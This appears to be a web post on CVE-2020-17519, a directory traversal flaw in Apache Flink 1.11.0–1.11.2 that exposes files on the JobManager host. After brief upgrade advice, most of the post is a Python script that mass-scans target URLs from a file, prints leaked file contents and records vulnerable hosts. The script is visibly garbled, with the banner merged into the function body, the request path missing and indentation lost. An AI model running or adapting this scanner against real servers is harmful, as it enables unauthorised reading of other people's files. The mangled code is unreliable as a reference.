Apache Flink 1.11.0–1.11.2 Vulnerable To Exploit CVE-2020–17519

Apache Flink 1.11.0–1.11.2 contains a flaw allowing hackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. To avoid exploitation it’s advised users upgrade to version Flink 1.11.3 or 1.12.0. Vulnerability listed as CVE-2020–17519

Exploit

#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
#affected versions are Apache Flink 1.11.0–1.11.2

import requests,sys,colorama
from colorama import *
init(autoreset=True)

banner=’’’�33{} is apache flink directory traversal vulnerability’.format(urls))
print(response.content)
f=open(‘./vul.txt’,’a’)
f.write(urls)
f.write(‘n’)
else:
print(‘�33{} None’.format(urls))
except:
print(‘{} request timeout’.format(urls))

if __name__ == ‘__main__’:
print (banner)
if len(sys.argv)!=2:
print(‘Example:python CVE-2020–17519.py urls.txt’)
else:
file = open(sys.argv)
for url in file.readlines():
urls=url.strip()
if urls==’/’:
urls=urls
verify()
print (‘Check Over’)

Structured View: https://skynettools.com/apache-flink-1-11-0-1-11-2-exploit-cve-2020-17519/